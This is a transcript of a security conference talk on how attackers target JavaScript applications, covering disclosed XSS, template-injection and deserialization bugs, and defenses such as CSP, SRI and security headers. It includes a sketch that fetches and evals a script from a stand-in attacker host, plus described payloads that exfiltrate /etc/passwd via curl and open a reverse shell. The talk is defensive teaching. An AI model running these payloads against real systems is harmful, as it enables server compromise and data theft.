Good afternoon, everyone. We've just finished lunch, and this is not sleepy time, so I'll try to keep this as interactive as possible. My talk is titled "Safety Not Guaranteed", and it's part of something larger we're doing today called the Application Security Clinic. My colleagues are in the audience, and I'll explain what we're going to do for the rest of the session. My name is Riyaz Walikar. Does anybody get the reference in the title? Yes — it's a movie about time travel: somebody claims to have travelled through time once and is asking for volunteers to travel back with them, but they cannot guarantee their safety. We picked the name partly because it sounded cool, but also because of the idea it captures: new JavaScript libraries and frameworks come out every month and every year, each adding features on top of what was built before and taking care of security considerations that were found earlier. They may all look shiny, but how do you guarantee safety? I work for Appsecco — I'm the chief attacker there. We do a lot of consulting work, and the advice we give clients is extremely pragmatic, actionable advice about the security issues we discover. We are a specialist security company. Here's a question for the audience: how many of you think this is a vulnerability? If it's not visible on screen, this is a very popular site — you've probably seen the URL around. If you open the console on this site and check the jQuery version, it tells you it's 2.1.3. And if you use the $.get method to call an external JS file, it actually loads it, executes it, and alerts document.cookie. Is this a vulnerability or not? Some of you say yes, some say no, and the rest are still digesting lunch.
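To make the console demo concrete, here's a plain-JS sketch of roughly what happens under the hood (the URL is a stand-in, not the one from the demo; jQuery's $.get passes a response served with a JavaScript MIME type to jQuery.globalEval, which behaves much like the indirect eval below):

```javascript
// A sketch of fetching a remote file and running it -- the fetched
// text executes with the privileges of the page that runs this.
async function loadAndRun(url) {
  const src = await (await fetch(url)).text();
  return (0, eval)(src); // indirect eval: runs the fetched code in global scope
}

// loadAndRun('https://attacker.example/payload.js');
// where payload.js could contain e.g.  alert(document.cookie);
```

Run by hand from your own console this is only self-XSS; it becomes a real vulnerability only if an attacker can make the page itself issue such a call with a URL they control — which is exactly the point of the question.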
All right, so what is the Application Security Clinic, and what do we want to do today? We're essentially trying to create a time and space for security discussion — if it's not visible, the background image is of time and space. The idea is to create an environment, a discussion amongst all of you, so that we understand what's happening with security in the actual developer world. This is a three-part thing: the talk happening here, a curated Q&A, and a Birds of a Feather discussion. At the end of this talk we'll have the Q&A session, and then for the Birds of a Feather discussion we move downstairs to the banquet hall — that's at 4 o'clock. We did this on the first day of Fragments as well. My team is here in the audience, so we'll all be taking questions at the end of the talk. Where's my team? All right, this is about me. My name is Riyaz Walikar, and I'm the chief attacker at Appsecco. I have several years of experience breaking stuff — offensive work against all kinds of targets, including Windows networks, Linux networks, mobiles, IoT devices, wireless networks, and applications. But my knowledge of JavaScript frameworks and libraries is very limited, so I come at this from the perspective of an attacker, which is why I have an exclusive slide saying that I break stuff for a living: I'm Not A Developer. I tried to find an abbreviation that would make sense to the dev folks, but NAD was not taken. And I apologize if anybody is offended by the image — I don't mean to imply that developers slouch while programming. So, what are we going to look at today?
We're going to look at what attackers look for when they target applications, specifically JavaScript applications. We'll also look at some publicly disclosed security weaknesses in frameworks and libraries, and in applications built using those frameworks and libraries — some client-side issues and some server-side JavaScript issues. We have a lot of stories from our pentesting experience, but I've selected a couple of them for this talk. A small part of the talk will also cover the impact of exploitation. This is one of the things we find difficult to explain to developers: the impact of an XSS, for example — the ability of an attacker to inject arbitrary JavaScript into your code — is often met with "OK. So what?" We'll try to answer that question if possible. I'll also give a brief overview of Content Security Policy, ending with Sub-Resource Integrity and some security headers that browsers already provide that you can use to protect your code. All right, the first section: as an attacker, how do I look at JavaScript applications — or any application, for that matter? Put in the most simplistic manner, you profile the target and you launch a targeted attack. I'll go into a little more detail, but given the number of frameworks and libraries, the choices out there can be overwhelming. When I started looking at frameworks and libraries, I first had to understand the difference between a framework and a library — I had to start from that point — and then move on to looking at the different frameworks and libraries available out there.
But all of this is visible to the attacker as client-side HTML plus a server-side component, which is why the attacker's setup can be as minimal as the attacker himself and what is known as an interception proxy. How many of you have used an interception proxy before? Like Burp — this is the icon for Burp Suite. And then there's the web server where the code is hosted. An interception proxy is essentially software that sits between your browser and the web server and allows you to tamper with outgoing requests and incoming responses. So if there is some restriction on the client side, I can use an interception proxy to change the data being sent across the network before it reaches the server. And if the code places some restriction in a response, I can intercept that, modify it, and let it render in my browser. That's what an interception proxy does. Burp Suite, apart from being an interception proxy, has a lot of other features — for example, modules you can use to repetitively run a brute-force attack. I won't cover those today, but it's something you could definitely try. So when looking at JS apps, what do attackers look for? This is a brief summary; there's an extended version of this slide at the end of the talk. First and foremost, when profiling the target, they want to identify the framework and then identify its version, because versions allow them to search for previously disclosed security issues. There are a lot of active security researchers targeting specific JavaScript libraries and frameworks, and they tend to find issues and disclose them publicly. All of that becomes useful when I'm trying to break an application. We also look at sources and sinks.
A source, when I'm looking at an application, is the point where data enters the browser's DOM, and the sink is where it ends up being used — as simple as an input field and an innerHTML write. We also look for error messages and stack traces, especially anything verbose printed to the console logs, and for client-side dynamic and hard-coded variables. Several times we've found security weaknesses because of something hard-coded inside the client-side code. And obviously communication channels like WebSockets and WebRTC — attackers especially use WebRTC to find the internal IP addresses of machines behind NAT. Now, let's look at a couple of security weaknesses. These are popular, publicly disclosed vulnerabilities in different frameworks, libraries, and applications built using them. We'll cover the client-side vulnerabilities first and move to the server-side issues next. So, there's a framework called Mavo — how many of you have used Mavo? It's fairly new. The idea is that in Mavo you have a $url object, and you can access URL parameters on it as properties: $url.a gives you access to the a parameter in the URL. So if you have ?spec=test, you can access the value test by reading $url.spec. The vulnerability that was discovered and well researched was this: if you use $url.spec directly in code, can anybody tell me the implication? What would happen? XSS, yes — cross-site scripting: user-supplied input is used directly in the output without sanitization, without removing malicious characters that could break out of the HTML.
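As an aside, the source-to-sink flow just described can be sketched in a few lines (names are illustrative; this is not Mavo's code):

```javascript
// Source: attacker-controlled URL parameter; sink: innerHTML.
// Vulnerable pattern (sketch -- do not use):
//   const spec = new URLSearchParams(location.search).get('spec'); // source
//   el.innerHTML = 'Result: ' + spec;                              // sink
//
// A minimal mitigation: encode HTML metacharacters before the sink.
function escapeHtml(untrusted) {
  return String(untrusted)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

console.log(escapeHtml('<img src=x onerror=alert(1)>'));
// -> &lt;img src=x onerror=alert(1)&gt;
```

Encoding at the sink is only the minimal fix; context-aware encoding or a templating layer that escapes by default is the better habit.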
And this results in an XSS vulnerability — in this case clearly with user-supplied data, because you control the parameter. One of the constraints was that the input you provide has to be valid JavaScript as well as a valid URL; only then does the exploit work. You do that by supplying spec=javascript: followed by the popular alert — used as a proof of concept for script injection — and then a comment character, so the rest gets commented out and the whole thing is rendered as proper JavaScript. And then comes the path, using something called double encoding: %25 decodes to %, and %2f is a slash. At the end of all this you have the final input, and it results in XSS. That's one of the client-side weaknesses this framework suffered from. AngularJS expression and template injection is the second example I have. Templating can be tricky, and I actually have a demo of this set up. This was a bug in Uber: one of their subdomains had an application using an older 1.x version of Angular. The server did not allow quotes, but the setup was such that you could inject curly braces and have them expanded — that is, the expression inside would execute — so templating was possible. The attackers wanted to generate a proper proof of concept, but you couldn't simply put an alert inside the double curly braces and get a POC out of it: apart from eval and alert not being allowed, object.constructor itself was inaccessible. So the attackers had to build a POC that would let them reach the constructor and use it to call a function that calls alert. The final exploit was obtained by assembling the string "constructor" from multiple literals. You start by creating an empty array.
Then you add each character from the output of each of those expressions to form the word "constructor". The final exploit looks like this — and I actually have a demo. In the URL, q= is some data you can provide. My demo apps are going to be really simple like this; there's no UI to them. There is reflection here: the server-side code — PHP in this case — takes the data as-is and reflects it back to the client, and if you look at the source, it's an Angular app. So first I confirm that templating is allowed: I'll say 5 minus 1, for example — and it evaluates, so it definitely works. And when I run the exploit code, the idea is to obtain the constructor, find the Function prototype, and call alert. What I'm trying to show you is that regardless of whether applications use standard frameworks and libraries, every time you let client data be handled inside output, vulnerabilities can creep in — and attackers are finding innovative ways of getting their code executed. Here's another XSS, in a piece of software called MDwiki. MDwiki allows markdown files to be loaded using an XMLHttpRequest. The URL is example.com/#!<markdown file>: the code reads location.hash, takes the value after the #!, and issues an XHR to it. If I as an attacker want to load arbitrary JavaScript, I just provide my own endpoint there. So the final exploit looks something like this, where the file at my URL contains the alert — the JavaScript that will finally be loaded. But one thing is going to prevent this exploit from triggering. Can anybody tell me what it is? Because my file is on a different domain, when the page tries to load it, the request will not succeed directly.
So we had to add a CORS header to the content being sent back — Access-Control-Allow-Origin: * — which then allows the target domain to load our file and execute it. All right, a couple of server-side weaknesses as well. Dust.js: this vulnerability was found on a PayPal subdomain, and it's pretty well documented. Dust.js is a templating engine for Node. Older versions used an "if" helper — the function has since been removed: you give the if helper a condition, and based on that condition you ask it to display or render something. The catch: this is the actual URL, demo.paypal.com/us/demo/navigation?device=desktop, and on the server side there was an if helper on device — if it is desktop, show this div; if it is mobile, show that. That was the code. But internally, the if helper was using something that, when attackers see it, gets them one step closer to executing their own code. Can you see the vulnerability in this code? Right — on line 215, "if" internally uses eval on the condition. On top of that, the application itself had some filters to block certain strings, so the attacker concatenated empty arrays and injected the Node code that was required: require('child_process').exec(...). The attack code did a curl to the attacker's domain with the output of /etc/passwd — so that's the /etc/passwd of demo.paypal.com, all because the if helper was using an eval. There was a pretty hefty bug bounty paid for this as well. The next one is server-side template injection in Jade — which I believe is now called Pug — a templating engine again for Node. This is not exactly a vulnerability in itself, but more like feature abuse.
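Before moving on to Jade — the Dust.js if-helper pattern above can be sketched like this (an illustration of the pattern, not Dust's actual source):

```javascript
// A template helper that eval()s its condition string. If the string
// comes from a request parameter (?device=desktop), the attacker
// controls what gets eval()ed on the server.
function ifHelper(condition) {
  return eval(condition) ? 'render-if-branch' : 'render-else-branch';
}

console.log(ifHelper('"desktop" == "desktop"')); // -> render-if-branch
// Instead of "desktop", an attacker can send something like
// require('child_process').exec(...) -- which is exactly what
// happened on the PayPal demo subdomain.
```

The lesson is the usual one: never let request data reach eval, even indirectly through a helper.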
The idea is that no matter what you use, as long as you take user input and make it part of your code, or do some processing on it, there is the possibility that you end up breaking something. This is an example of how templating can lead to code execution if user input is not sanitized before being used somewhere else. The demo for this was on codepen.io. The specific exploit that achieved code execution has been fixed, but everything up to the step just before executing code on the server still works, so I reproduced that part. Let's see what it is. To be clear, this is not a vulnerability in CodePen itself or in Jade; it's feature abuse in the context of a particular implementation. I'm assuming everybody's used CodePen at some point. So I declare a variable x and start enumerating — my JavaScript is pretty bad, but I was trying to get familiar with the interface Jade exposes. I look for the root namespace, and you can enumerate it on the server itself. I then enumerate root.process, and it gives me access to all the sub-methods and other things I can call. From here, the interesting bits: there were a bunch of other commands you could run, but what I did was look in root.process for the working-directory function, which gets me the current working directory on the server — so I'm effectively able to enumerate things on the server here. The next thing I tried was getuid, a function listed there that would tell me the UID of the owner of the process executing on the server. But they had implemented a check on keywords like getuid and a few others. The way to bypass it was simple: I split the name into two strings, concatenated them, and called the result.
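That bypass, sketched (names are illustrative, not the exact CodePen payload):

```javascript
// The filter blocked literal keywords such as "getuid", so the name is
// assembled at runtime -- a plain string-match filter never sees the
// forbidden word in the submitted template.
const name = 'getu' + 'id';
console.log(name); // -> getuid

// With the name assembled, the call is just a computed property lookup.
// (process.getuid exists on POSIX systems only, hence commented out:)
// console.log(process[name]()); // UID of the server process
```

This is why keyword blacklists are a weak defense in any language with string concatenation and computed property access — which is to say, in JavaScript, always.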
So that was a bypass of their protection. Now, if I wanted to execute my own code, I would need child_process, so I tried to see if I could get access to require. Using root.process I enumerate mainModule and check whether require is available — it is. I try to arbitrarily load a module called a; a is not found, which is why I get a "Cannot find module" error, but it confirms require works, and right after this was the step where you could get code execution. Interestingly, the person who originally found this was able to obtain child_process and issue an exec command: the output of id was sent to an IP address on port 80 using netcat, and they had code execution. Again, not a vulnerability in CodePen, but feature abuse — if you're using Jade to build apps, it's something you might want to look at. Here's another interesting vulnerability, with node-serialize in Node.js. This was discovered by a fellow community security researcher named Ajin. While doing a code review, he found that the user's cookie was being passed to the unserialize function — and internally, unserialize uses eval for deserialization. Now, cookies come from the client, and most developers I know inherently trust that malicious data will not arrive in cookies: you sanitize input at the login form or the input text fields. But we've found security issues by putting malicious data inside User-Agent strings and inside cookies. Anything that goes from the client to the server is tamperable — with an interception proxy or something like it, we can intercept, tamper with the contents, and then send them on. I'll do a demo of this in a little while.
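Stripped of the library, the core of the bug can be sketched like this (naiveUnserialize is my own illustrative name, not node-serialize's API, though the package's unserialize does essentially this for values tagged as functions):

```javascript
// Deserialization that eval()s attacker-controlled data.
function naiveUnserialize(str) {
  return eval('(' + str + ')');
}

// A harmless cookie round-trips fine...
const profile = naiveUnserialize('{"username": "riyaz"}');
console.log(profile.username); // -> riyaz

// ...but a function expression followed by () executes DURING
// deserialization. Replace `return 42` with
// require('child_process').exec(...) and you have the reverse
// shell shown in the demo later.
const evil = naiveUnserialize('{"pwned": (function(){ return 42; })()}');
console.log(evil.pwned); // -> 42
```

The safe alternative is JSON.parse, which parses data and can never execute it.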
But it's as simple as this — the most simplistic code you could implement is on the slide: notice that the unserialize function is called, and the cookie is what gets passed in. I'll demo this when we come to the section on impact; I have a pretty cool demo lined up for it. Now for some stories from our pentesting experience. Apart from finding issues like the ones above, most of the time you find issues that could easily have been avoided if security had been built in with the idea that attackers are going to send malicious content to the application. In the work we do at Appsecco, we've been able to compromise multiple applications simply because of a very tiny, minuscule vulnerability, and we've been able to chain several of those across networks and systems to gain the ultimate prize. For attackers the ultimate prize is mostly data, or command execution on the server. Mostly data — though I prefer the command execution bit; the other folks on my team prefer the data, so there's a difference of opinion there. Let's see some of the stories. This was a popular one. We had a client — a pretty large client in the financial sector — using a React app to deliver the UI, with authenticated JSON endpoints populating the data; that's what I understood of the setup. We were trying to figure out the endpoints in the application, and one of the earliest things we did was access the application through the interception proxy. We didn't have credentials for the application, so when we looked at the responses and saw authenticated: no, we changed it to authenticated: yes in the response.
We didn't have any session — nothing had been created on the server — but when I let the modified traffic come back to the browser, the browser rendered some of the UI elements, and we knew what the admin or the user would see. I work with visual cues, so it was important for me to see that. And it was pretty interesting to see that all the application did was check whether the authenticated flag in the JSON came back as true — a marvelous discovery, in my experience. But then I realized this alone wouldn't count as a vulnerability, because this is just how JS apps work. More interestingly, the application was encrypting the password before sending it to the server. The login page had username and password fields (and a third field that's not relevant), and the password was encrypted client-side before being sent out, so in the interception proxy I was seeing the encrypted password. The question we — like any attacker — asked was: how is this being encrypted, and where is the key stored? The key was a static key, and they had done all sorts of things to hide it, with a lot of JavaScript randomly calling a bunch of other things that did nothing. The key was well hidden, and it took some time to figure out that it was right there on the client, and what the key actually was. So they used a static key on the client, and the same key was being used on the server for decryption — a fair assumption: if you encrypt something on the client and send it to the server, the server needs the same key to decrypt it. The key and the IV were stored in plain text in a convoluted mass of client-side JS, in one of the libraries.
The interesting bit was that the client was reusing the same crypto components on multiple sites. The client was a vendor for somebody else: they had built multiple applications and were using the same key and IV across all of them. What's the problem with that? Hack one, hack them all. The primary problem we saw as attackers was what happens if there's a security breach in the future. We hear of security breaches all the time; there are websites where you can enter your email address and learn whether it was found in a breach — actively finding out whether your accounts are compromised is one of the services we provide, too. If your account is compromised and your encrypted password is leaked, the key and IV sitting in the client make decryption possible. A data breach leaking encrypted credentials would hurt this client all the more, because with the key available you'd be able to decrypt the entire database dump. So when the media says there was a breach "but the credentials were encrypted", you need to ask how the encryption happened. It may well be that the key is lying there in the browser for somebody to pick up and reverse your encrypted tokens. The second interesting story, again with a very large client in the financial sector, involved a very resource-heavy JS framework. Interestingly, the site had the X-Frame-Options header set to prevent clickjacking attacks. I'll come to X-Frame-Options a little later, but the idea is that with the header set, another website can't overlay or iframe this domain.
There's a whole class of attacks called clickjacking where, using hidden divs and other tricks, an attacker can steal data: it appears that you're typing into the actual domain, but the input actually lands in the attacker's page. The X-Frame-Options header prevents that from happening — it tells the browser, don't load this page in an iframe. When I saw the X-Frame-Options header, we were convinced there was no clickjacking. But the interception proxy also has a scanner module that passively looks at the traffic passing through it and flags security weaknesses, and it kept complaining that the site was vulnerable to clickjacking — which was interesting, because the header was there. This was the header: X-Frame-Options: SAMEORIGIN — and there was a typo in it. Can you see it? You will not believe it when you do: there is a single space at the beginning of the value, causing the header to fail. That allowed the site to be iframed, as if the protection weren't there at all, and we were able to build a POC of phishing attacks. The fix was as simple as removing that space — but it had crept in, and that's the thing I wanted to share. Another story: a client — a large customer in the automobile industry — had a blog with functionality to load pages from the web root directory, and it used a regular expression that checked whether the URL being loaded contained a specific string. The URL was of this form: example.com/#register, and cross-site requests were being prevented using a regex check. This is the regex.
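Sketched with stand-in names (the client's real domain and pattern aren't reproduced here), the check and its weakness look like this:

```javascript
// The check only asked "does the trusted string appear ANYWHERE in the
// URL?", not "does the URL START with the trusted prefix?".
const loose  = /client\.example/;                // unanchored: substring match
const strict = /^https:\/\/client\.example\//;   // anchored to the start

const attack = 'https://attacker.example/access.php#https://client.example/';
console.log(loose.test(attack));  // -> true   (check passes: bypass)
console.log(strict.test(attack)); // -> false  (anchored check holds)
```

Even the anchored regex is fragile as a URL allow-list; parsing the URL and comparing the hostname exactly is sturdier still.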
So when I try to access it with the hash set to http:// followed by my own domain and access.php — the server where I host all my exploit code — it's treated as an invalid page, because it doesn't match. If you try to load pages from the web root, it works; if you try to load another domain, it doesn't. What's the bypass? I can't change the check itself — so if I want to attack somebody, what URL do I send them? If you look at the code, it was not checking whether the expected string appears at the beginning; it was checking whether it appears anywhere. So you could load the attacker's file and simply append the client's domain at the end of the URL, and the exploit worked. Successful exploitation led to us compromising a higher-privileged account, logging in, and accessing a lot of data from the application itself. Now — you hear about XSS and code execution vulnerabilities, but what exactly is the impact? With XSS you hear you can steal tokens and sessions and things like that. I'm really short on time, so I'll skip the XSS demo, but there is a framework called BeEF that is actively used by a lot of attackers to take that access to the next level. Apart from stealing session tokens, you can control the browser in a lot of other ways: once a victim is hooked — you supply the BeEF hook.js — you have access to a framework that lets you execute a lot of other things. If the victim is using an older browser, you can simply select Metasploit and run browser autopwn: it will find a vulnerability the browser is susceptible to, exploit it, and give you a shell on the client's machine. Among a bunch of other things, you can also use it to steal tokens from the page, send phishing content, or change the page to trick the user into enabling their webcam — it takes the access to a whole new level. Now I'll run the demo for the node-serialize bug.
My Node app looks like this: it just prints hello plus data from the cookie. This is what Burp looks like — the interception proxy I was talking about. I've enabled interception now, so when I load the page you can see that I'm able to intercept the request; I'll forward it. If I reload the page, you can see that the cookie was set by the server, and I can see its value. I'll put it in Burp's Decoder — Burp has a lot of functionality you can actively use to check the security of your apps. It decodes to a serialized string: username (my name), country India, city Bangalore. On the server, the code picks the username part from the string and prints it. Now, the exploit: I'm going to do an exec that calls out to /bin/bash — or rather spawns /bin/bash — and I'm sending that as the profile value. On my machine I've started a netcat handler, and I'm targeting this domain. Let's hope it works. When I send it, the payload is deserialized on the server, and the eval causes the netcat-to-/bin/bash function to execute. And there we go — this is a different server, and because of the vulnerability you're able to get a reverse shell back on your machine and take control of the system itself. Code execution bugs are bad: if attackers can execute commands on a server, it's almost always game over. Let's quickly move to the next section: Content Security Policy. This has been a standard for quite some time. By setting headers in your HTTP responses, you can tell the browser where content may be loaded from. The controls are called directives, and you can set the kinds of directives you want — for example, you can set a policy that script sources must come from a specific domain. There are a bunch of them; this is what a policy looks like.
In its simplest form, a policy looks like this. default-src is the fallback: if a more specific source list like img-src or connect-src isn't present, the browser falls back to default-src. Here default-src is 'none', script-src is 'self', connect-src is 'self', and img-src is 'self' — so you can't load cross-domain images and the like. But that's too simplistic; in the real world policies look something like this. Again, this one is for a PayPal domain, and as an attacker it gives me a lot of information. For one, I learn more PayPal domains. For another, if any of these whitelisted domains is a place where I can write my data as an attacker, and I then find an injection issue on this site, I'd be able to load my script regardless of whether a CSP is there or not. Imagine if one of those entries were an Amazon S3 URL: I could host my script in my own bucket and load it from there. CSP also has a reporting mechanism, where violation reports are sent as JSON POSTs to a report URI. The policy looks like this: Content-Security-Policy with a report-uri pointing at the endpoint where you want to collect the data. Consider this policy: default-src 'none', style-src pointing to a CDN, and this report-uri. When I try to load a stylesheet from the same domain, it violates the policy, and the browser sends this JSON POST as the CSP violation report. Coming to the next part: Sub-Resource Integrity. Have any of you used Sub-Resource Integrity? Yes? The idea is to answer the question: is the file you fetched really the file you meant to fetch? Sub-Resource Integrity is a security feature that enables browsers to verify that the files they obtain — from a CDN, for example — are delivered without unexpected changes.
It works by allowing you to provide a cryptographic hash that a fetched file must match. If you get a file from a remote CDN, its hash should match the hash that is already in the script tag in your HTML. Why do you think that's necessary, or why do you think that will help? If somebody tampers with the content on the way, the hash check will fail and the browser will not load the file, right? So it's pretty useful. This is how it looks: you have a script tag with the source and the integrity attribute set to the SHA of the file. How do you generate this on the server? Multiple ways: you can use openssl or shasum to generate it and put it in the page. So if somebody tampers with the file, the browser will not load it, because the hash check has failed. In combination with CSP, you can add require-sri-for script and require-sri-for style to your content security policy. Those two directives are something you can pass.

There are a couple of other security headers in browsers that work as defense in depth to slow down attackers. One of them is X-XSS-Protection, designed to enable and enforce the XSS filter built into modern browsers. X-XSS-Protection: 1 enables it, and it has two modes, mode=block and report=<uri>. HTTP Strict Transport Security allows you to restrict the browser to access content only over HTTPS. This is another header that you can add. X-Frame-Options, which we saw an example of earlier, prevents pages from being loaded in iframes, thereby providing clickjacking protection. It has different modes. DENY is if you don't want the page to load in any iframe, regardless of what the origin server is. X-Frame-Options: SAMEORIGIN allows the iframe if you are the origin, right? And you can explicitly set which origin using ALLOW-FROM. Another one is X-Content-Type-Options.
This can be set to nosniff. What it does is prevent browsers from guessing what the content type of the response is. If you send mixed data, IE sometimes does that. I know IE is mostly used to download other browsers, but some people still use IE because of requirements and other things. IE would sometimes sniff the content and guess the type based on what the content is, right? So this allows you to strictly say: don't guess, use the Content-Type response header that is coming back.

What are a couple of other things that you can do? I found this on a site where somebody had submitted a bug, right? Doing this will not stop attackers, okay? I mean, the console is actively used by developers as well as attackers to figure out a bunch of information. It says something like: this is a console for developers; if someone has asked you to open this window, they are likely trying to compromise your account; please close this window now. Okay, this is not going to stop attackers.

I discovered this next one with the help of one of my colleagues, who is a much better Node developer than I am. He taught me about helmet, right? And I believe a lot of Node developers already use this. If you don't, then helmet is pretty cool. You can use it to set custom security headers: it's as simple as calling hidePoweredBy to hide your server version, plus noSniff, xssFilter, referrerPolicy, et cetera. And you can also set the content security policy through its directives. It's pretty cool.

Retire.js is another project. It's many things, but we actively use it as part of the Burp interception proxy. It gets loaded as a module inside Burp, and you can use it to find whether any of the libraries you're using in an application are outdated, right? All you have to do is add it to Burp and browse your website.
At the end of your browsing session, go back to your interception proxy, look at the target, and it will tell you which libraries are outdated. CSP Evaluator is another website you can use to see whether your CSP will hold up, or rather whether it is syntactically right. You can try different directives there and check them.

One of the common questions we get asked is: where do you start if you want to look at application security, where do you go next, and what if you want to break stuff and understand the mindset of an attacker? The OWASP project is a very good resource. They have something called the OWASP ASVS. OWASP is the Open Web Application Security Project. It has a lot of documentation around how you can attack applications and how you can build applications securely. The OWASP Top 10 is a list of the most common vulnerability classes; attackers routinely try and see if these vulnerabilities exist in applications. There's also the Testing Guide if you want to get active with security testing. And obviously the security documentation for your framework and library would be very helpful here. Apart from that, start thinking like a potential attacker: look at the attack surface your application provides and the assumptions that are already made in the system. These are two important things that will work in your favor.

So, coming back to the takeaway: when looking at JS apps, what do attackers see? What do they target? What do they look for? Identification of frameworks and libraries: version numbers especially are very clearly written in your JS files, and using those, they look for previously discovered security issues. Sources of user-supplied data. Endpoints discoverable through JS code. Error messages and stack traces. Console messages, another thing. Embedded, hardcoded variables and tokens. Browser storage mechanisms.
Sometimes you see an application store data in localStorage and sessionStorage; that can sometimes be sensitive information right there. Cross-origin communication. External sources of JS, CSS, images, fonts, any static content that you load. And communication protocols like WebSockets and WebRTC.

This is again a reminder of the application security clinic that we are running. That's our Twitter handle. Thank you so much. We'll have a question and answer session now. I would like to call my colleagues, Akash Mahajan and Abhishek Dutta, on stage as well. And we also have time for questions in the hall. So if you have any questions, yeah, this side.

At the start, you showed the JSFoo website, but you did not answer the question.

I was waiting for you to ask. How many of you still think this is a vulnerability? One, two, three, four. How many of you don't think this is a problem? We had an internal debate about this, and we figured it wouldn't be a problem, because to exploit it you're asking the user of the app to open the console, and the recommendation would then be: please add that "stop, close the console right now" message, right? But we noticed that to properly execute code we'd have to go through a lot of hoops, and by itself, being able to call third-party URLs is a feature of jQuery.

Hi, very interesting talk. I have a couple of questions that are not related to each other. One of the things I've noticed, especially accessing sites in India, especially government sites, is that security is not at all a priority. In fact, I remember once accessing the IPSF site, and they were sending the one-time password back to the client in the response. So you can just look at the response and see the one-time password. So my question is, when you find these vulnerabilities, how do you go about gently reporting them, especially in the government domain, if you do that?
And how do you instill that sense that security needs to be a priority? That's one. And then the second question is about service workers, which is a relatively new spec in JavaScript. I saw a talk by Douglas Crockford, and he said that the service worker API is one of the biggest vulnerabilities in the JavaScript/HTML spec right now. So have you guys looked into that, and is there any advice on that aspect?

Yeah, as individuals we may be reporting these, but we usually don't report vulnerabilities that much. Let me figure out the mic. Is it working now? Oh, sorry. Yeah, we don't really report vulnerabilities. There is a mechanism where you can report to two different agencies, but usually nobody responds, or the mail might bounce, right? One is the CERT website, which is supposed to be the nodal agency, but they're usually overwhelmed. And the other is this new agency that's been set up, the national critical infrastructure something — NC-something, I think, double-I or whatever. If you Google for national critical infrastructure India, you'll get that website. They are supposed to be the ones to pass a report on to whatever the relevant department is, right? Typically in other countries where security reporting and triage is common for government agencies, you have sectoral CERTs, right? For an industry or a particular sector, you'll have an emergency response team, and typically they will be the ones receiving these reports, but we don't have that yet. And on the second question, I don't have experience with service workers as such, but it's very interesting to know that that's a vulnerability area. We haven't really tested any applications with them so far. So if you have one, let us know. Any questions from the balcony? Yeah. Hey guys, thank you for the talk.
Have you guys ever looked at languages which compile to JS, like Elm? Because you're not actually writing JavaScript, you're writing in some other language which compiles to JavaScript. So are there any security vulnerabilities, or does it improve security — how does it affect security as such? Have you guys looked into it?

The short answer: it makes no difference at all. The longer answer is that we typically don't think about the language, the framework, or the application feature. We typically look at request and response, and we try to enumerate which requests can be manipulated by user input, right? If you look at an application, or anything around the application, that's the first thing to look at. The second is to understand and consider whether there are any configuration-based infrastructure protections in place, okay? For us, if we control the network between the client and the server, then anything which is SSL or TLS doesn't matter, because whatever security you have on the client side assumes the endpoint is not evil, right? The same goes for anything which relies on response headers that are meant to protect the end user because the browser understands them, right? Riyaz joked that IE doesn't understand something, right? That just means a modern version of the browser will understand that response header and allow or disallow something, right? But it is very trivial to strip off that header. And if the header doesn't reach the browser, the browser doesn't know, right? So for us, the most important part is the user input.

But consider an application where you have to, you know, trust the user. Any application which is enabling payments, right? You're saying, okay, I allow people to buy stuff or send money over or whatever. That particular user, for that transaction, cannot be considered evil.
Your architecture has to make sure that whatever fraud check, whatever reconciliation has to happen, happens on the server side, right? Anywhere — be it a mobile app, a single-page app, anything where the business logic ends up in the client, which the end user can obviously manipulate — it's game over. Does that answer your question? Anyone else? Yeah, question there.

Hello. Please stand while asking the question. Please stand up while asking the question. We are recording. Fine. Okay, one day I was creating an application where a user can enter some number, and the number is validated on the server side: it should not be zero, and it should be within the value the user has. But if you enter a number beyond the maximum limit of a number, Node.js was not catching that, and the user was able to enter the number. How do you tackle that?

On the server side, have a different data type for the check then? No, even before that: if your design, your architecture for the application, your requirements have the number be in a particular range, you can check just for that range. And I think this is like an overflow that Node doesn't recognize. What you're saying is that if the number is larger than a certain value, then Node.js is not considering it. I really think you should look into the documentation of Node.js — how it treats integers and what the corner cases are — and handle it accordingly. Will it raise a runtime exception then? int16, int32 are different. All right, or maybe there are other libraries to handle large numbers. In Ruby, I know there is a class called Bignum that is meant to handle very large integers, more than 32 bits. PHP also has a similar one. Yeah, question on that side?

So, usually what I see in a lot of teams is that security is always an afterthought, right?
Like, after the company is big enough, or after they get hacked once, that's when people start taking security seriously, right? And I guess as front-end developers, most of the attacks start at us, right? Something as simple as XSS. So I'm asking for recommendations: what are the few things, where do front-end developers get started, and how do they make security part of their development process rather than an afterthought?

You want the funny answer or the real answer? Let's start with the funny one. Change the company. I'll just tell you, right, I tried that, it didn't work. Well, anyone who's hiring, you know who to talk to. It's like he asked earlier, right, why don't government agencies really think about security, and why do government websites tend to be insecure? The reality is that most things we look at — because our world is a little more tinted — are insecure, right? And it's immaterial whether it's a large Indian company or a large company from anywhere else, a small startup in Bangalore or a small startup in the Valley. Most people are thinking about features and what to release rather than how to stay secure. Unless and until it's led by legislation or compliance or something else, right? I honestly don't have a good answer for you. What I would say is that we're available downstairs after this; maybe we can continue the discussion there, but there is no simple answer, sorry.

The resources are available; what he's asking is how he convinces his company. Oh, I can't really tackle that. Sounds like this will be a fantastic discussion for the rest of this clinic, which is at four o'clock downstairs in the round table area. I think we're ready for our next presentation. So let's give a round of applause.